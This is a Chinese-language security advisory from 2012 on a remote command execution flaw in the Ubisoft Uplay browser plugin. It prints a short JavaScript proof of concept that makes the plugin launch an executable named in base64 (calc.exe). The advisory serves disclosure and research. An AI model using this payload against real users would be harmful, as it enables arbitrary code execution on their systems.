Ubisoft Entertainment UPLAY 'OBJECT'控件远程命令执行漏洞

Ubisoft Entertainment UPLAY 'OBJECT'控件远程命令执行漏洞

发布日期：2012-07-29
更新日期：2012-07-31

受影响系统：
Ubisoft Entertainment UPLAY
描述：
--------------------------------------------------------------------------------
Ubisoft Entertainment于1986年在法国巴黎成立，目前已经是全球领先交互式娱乐软件开发和发行公司之一。Uplay是与育碧游戏捆绑的一个系统，它有防盗、奖惩的功能，是Ubisoft为扩展自家游戏的延伸价值而开发的，正版玩家可以在游戏过程中解锁各种成就，然后用成就点数换取特殊奖励，比如特殊套装等。同时也会提供一些收费道具给玩家购买。

UPLAY在其控件'OBJECT'的实现上存在安全漏洞，远程攻击者可利用此漏洞远程启用Windows内置计算器，从而执行任意命令，控制用户系统。

<*来源：Tavis Ormandy （taviso@gentoo.org）
 
  链接：http://seclists.org/fulldisclosure/2012/Jul/375
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Tavis Ormandy （taviso@gentoo.org）提供了如下测试方法：
x = document.createElement('OBJECT');
x.type = "application/x-uplaypc";
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path
QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode
-uplay_dev_mode_auto_play")

$ printf "C:\\WINDOWS\\SYSTEM32\\CALC.EXE" | base64
QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ==

建议：
--------------------------------------------------------------------------------
厂商补丁：

Ubisoft Entertainment
---------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://ghostrecon.us.ubi.com/